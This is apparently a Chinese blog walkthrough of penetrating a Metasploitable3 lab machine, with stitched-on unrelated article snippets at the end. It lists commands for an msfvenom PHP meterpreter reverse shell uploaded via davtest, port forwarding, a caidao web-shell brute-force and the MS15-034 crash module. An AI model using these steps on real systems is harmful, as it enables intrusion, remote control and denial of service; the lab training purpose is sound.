metasploitable2基于ubantu的渗透演练环境。Rapid7官方长时间未更新,导致跟不上当前的节奏。metasploitable3出世。

metasploitable2配合metasploit的模块进行使用,速度很快。

metasploitable3更加难被攻破,有些漏洞在metasploit中没有漏洞利用模块,需要测试人员自己挖掘。

一台metasploitable是不够用的,真实攻击中都会牵连到很多服务器和计算机,它可以扩展,将metasploitable3安装到多台终端内,建立相关节点。

以下部分是渗透例子之一:从用nmap发现靶机存在多少端口,然后利用kali自带的DAVtest检测是否存在上传漏洞,到生成payload,到打开msf,加载exploit/multi/handler模块,设置好本地的端口与地址

推荐参考资料:https://jingyan.baidu.com/article/7f766daf9cced24100e1d046.html    这是对win7系统的攻击

面对靶机时,踩点:nmap网络扫描工具      【kali nmap的使用】

nmap -sS -sV -v -n -p- -oX demon.xml 192.168.1.151      【内网靶机不需要解析DNS】

扫描结果关注到8585端口   存在 http   php   dav等应用     【对扫描结果的解读】

DAVTest上传测试的可执行文件,渗透测试快,轻松确定是否启用DAV服务攻击。      【漏洞测试】

msfvenom -p php/meterpreter_reverse_tcp  LHOST=192.168.1.152 LPORT=5555 -f raw >davtext.php    【生成反向链接攻击载荷,后门】

msfconsole                   【生成载荷以后,本地也要启动服务】

msf > use exploit/multi/handler                          【生成载荷以后,本地也要启动服务】

set PAYLOAD php/meterpreter_reverse_tcp              【生成载荷以后,本地也要启动服务】

show options                     【看一些设置有些什么东西】

set LHOST 192.168.1.152

set LPORT 5555                【设置一下,跟载荷对应上】

davtest               【看一下帮助信息,用于生成以下命令】

davtest -url http://192.168.1.151:8585/uploads -uploadfile davtest.php -uploadloc DavTestDirXp317s2YNZmKZKU/demon.php  【上传攻击载荷到靶机】

exploit         【处于监听状态,靶机一点文件这个地方就会弹出meterpreter会话】

help      【看一下meterpreter的帮助信息】

shell       【跟dos命令差不多】

rdesktop 192.168.1.151:3389           【手动链接一下远程桌面,看看有没有防火墙】

portfwd -h           【看一下meterpreter的端口转发帮助信息】

portfwd add -l 7777 -p 3389 -r 192.168.1.151       【将本机的7777端口转发到目标机的3389端口】

rdesktop   127.0.0.1:7777                【本地转发设置好了以后,访问本地就等于访问了目标机,这就是转发的情况体现】

meterpreter > background       【退出】

msf exploit(handler) >  back    【退出】

msf > services

msf > workspace  -a davtest     【创建一个工作区】

msf > db_                【看一下数据库功能】

msf > db_import demon.xml   【数据库导入看一下扫描结果的报告】

msf > services  【看一下扫描结果的报告】

ssh -L 3389:loaclhost:3389 vagrant@192.168.1.151       【将本机3389转发到对方3389,这里需要寻找ssh的账号密码】

nmap -p 3389 192.168.1.151           【扫描一下3389】

nmap -p 3389 127.0.0.1         【扫描一下本机的3389】

rdesktop   127.0.0.1:3389        【设置好本地的端口转发后,直接访问本地就等于访问目标机器的IP+端口】

官方wiki      无语了,中国菜刀都被他们看见了。

https://github.com/rapid7/metasploitable3/wiki/Vulnerabilities

1.chinese caidao   ----中国菜刀,加入了中国菜刀元素:一句话木马       位置:http://localhost/caidao.asp

2.80端口 --http    MS15-034/CVE-2015-1635  HTTP远程代码执行漏洞(远程蓝屏代码)(远程溢出漏洞)

微软IIS 6.0以上的windows server 2008 R2/2012/2012 R2以及windows 7/8/8.1系统都会受到这个漏洞影响

模块位置   msf:use  auxiliary/dos/http/ms15_034_ulonglongadd

进阶:如果找到其他应用软件的各种漏洞利用模块,如上,要弄一个人将变得极其简单化。

【危害还是非常大的,不要玩火,不得攻击他人。打不过你报警来凑】

msf > search caidao                 【漏洞利用模块举例】

msf > use auxiliary/scanner/http/caidao_bruteforce_login                  【菜刀扫描模块】

show options       【查看设置】

set RHOSTS 192.168.1.151          【设置目标机】

set THREADS 10   【设置线程】

set TARGETURI /caidao.asp

run

search ms 15_034      【搜索远程蓝屏代码漏洞编号】

use auxiliary/dos/http/ms15_034_ulonglongadd          【执行蓝屏代码漏洞的载荷模块】

show options

set RHOSTS 192.168.1.151

exploit             【服务器马上蓝屏】

其他参考资料

hacking metasploitable 2

http://www.youtube.com/watch?v=jDqmEY_3zY&t=1625s&index=3&list=PL17Q7Iw6SshlCNN1pVIkFR4B4mXBqPRdD

www.youtube.com/watch?v=JoV1aSuy1XU&index=4&list=PL17Q7Iw6SshlCNN1pVIkFR4B4mXBqPRdD

www.youtube.com/watch?v=8z12kdEw2v8&list=PLPL17Q7Iw6SshlCNN1pVIkFR4B4mXBqPRdD&t=33393s&index=1

MSF精华合集      ZANYAR MATRIX发布的

www.youtube.com/watch?v=8z12kdEw2v8&list=PLPL17Q7Iw6SshlCNN1pVIkFR4B4mXBqPRdD&index=1&spfreload=10

书籍

菜鸟腾飞 :metasploit渗透测试平台之应用 --飞飞

T00LS metasploit  第一季度 第二季   ---羽翼

5期-Metasploitable3专题课程的更多相关文章

  1. 最新linux运维高级架构课13期 架构师课程

    有会员购买的,分享给大家.完整一套,可以学习一下.     ├─L001-2017linux运维高级架构师13期-运维与自动化运维发展-10节 │      1-1运维职业发展.avi │      ...

  2. 图灵学院java架构师vip课程第二期 完整版课程下载 无加密

    部分目录2020年新图灵学院Java二期架构师教程下载[课程目录]├──一.VIP课程:互联网工程专题├──二.VIP课程:源码框架专题├──三.VIP课程:并发编程专题├──四.VIP课程:性能调优 ...

  3. python22期第一天(课程总结)

    1.Python介绍: python是一门高级编程语言,涉及领域比较广泛,社区活跃,由一个核心开发团队在维护,相对其他语言,易于学习,可移植性强,可扩展性强,易于维护,有大量的标准库可供使用. 2.P ...

  4. 最新咕咆+鲁班+图灵+享学+蚂蚁+硅谷+源码 Java架构师资料《Java架构师VIP课程》

    最新的Java架构师完整资料,完整视频+源码+文档. 每一套都是一百多个G的资料,无密. JAVA架构师全套课程 咕泡学院互联网架构师第一期 咕泡学院互联网架构师第二期 咕泡学院互联网架构师第三期 博 ...

  5. iOS移动开发周报-第25期

    iOS移动开发周报-第25期 [摘要]:本期iOS移动开发周报带来如下内容:苹果发布 iPhone6 和 Apple Watch.Swift 1.0 GM发布.Xcode 6支持PDF Vector作 ...

  6. MSDN Webcast 系列课程

    云计算(Cloud) 云起龙骧系列课程 网络开发(Web) ASP.NET 4 风云之旅系列课程 ASP.NET 开发实践系列课程 MOSS2007 最佳实战 StepByStep 系列课程 Silv ...

  7. Web前端开发推荐阅读书籍、学习课程下载

    转自http://www.xuanfengge.com/fe-books.html 前言 学校里没有前端的课程,那如何学习JavaScript,又如何使自己成为一个合格的前端工程师呢? 除了在项目中学 ...

  8. day81:luffy:课程分类页面&课程信息页面&指定分类显示课程信息&分页显示课程信息

    目录 1.构建课程前端初始页面 2.course后端的准备工作 3.后端实现课程分类列表接口 4.前端发送请求-获取课程分类信息 5.后端实现课程列表信息的接口 6.前端显示列表课程信息 7.按照指定 ...

  9. Django之Model

    一.字段 常用字段: AutoField:int自增列,必须填入参数 primary_key=True.当model中如果没有自增列,则自动会创建一个列名为id的列. IntergerField:一个 ...

随机推荐

  1. 2019 Multi-University Training Contest 2 - 1009 - 回文自动机

    http://acm.hdu.edu.cn/showproblem.php?pid=6599 有好几种实现方式,首先都是用回文自动机统计好回文串的个数. 记得把每个节点的cnt加到他的fail上,因为 ...

  2. 微信jssdk配置的问题,使用MVC制作的demo

    一,view代码 <script src="~/Scripts/jquery-3.3.1.js"></script> <script src=&quo ...

  3. 07-js数据类型

    # JavaScript 基本数据类型 typeof函数获取一个变量的类型: ```angularjs* boolean - 如果变量是 Boolean 类型的* number - 如果变量是 Num ...

  4. 从后台看python--为什么说python是慢的

    python越来越作为一种科学技术研究的语言越来越流行,可是我们经常听到一个问题,python是慢的.那么我们从后台分析一下,为什么python是慢的. python是一种动态类型,解释型语言,它的值 ...

  5. js中的回调地狱 Callback to Hell

        本文重点:解决方式:1.promise  2. 拆解 function:将各步拆解为单个的 function  3. 通过 Generator 函数暂停执行的效果方式 4. 通过ES8的异步函 ...

  6. 线程屏障CyclicBarrier实现原理

    生产环境中,存在需要等待多个线程都达到某种状态后,才继续运行的情景.并发工具CyclicBarrier就能够完成这种功能.本篇从源码方面,简要分析CyclicBarrier的实现原理. 使用示例 pu ...

  7. 一、模型验证CoreWebApi 管道方式(非过滤器处理)

    一.新建.Net Core的MVC项目添加WebApi控制器的方式 using System; using System.Collections.Generic; using System.Linq; ...

  8. 脚本_统计 Linux 进程相关数量信息

    #!bin/bash#作者:liusingbon#功能:统计 Linux 进程相关数量信息,running(运行的进程),sleeping(睡眠中的进程),stoped(停止的进程),zombie(僵 ...

  9. Linux架构之Nginx 负载均衡会话保持

    案例No.50:Nginx负载均衡会话保持 前期准备环境 web01.web02 (web01.web02.db01.nfs01都要优化基本源)[root@web01 ~]# vim /etc/yum ...

  10. wenzhang

    作者:周公子链接:https://zhuanlan.zhihu.com/p/94960418来源:知乎著作权归作者所有.商业转载请联系作者获得授权,非商业转载请注明出处. 2006年2月9日,首都经济 ...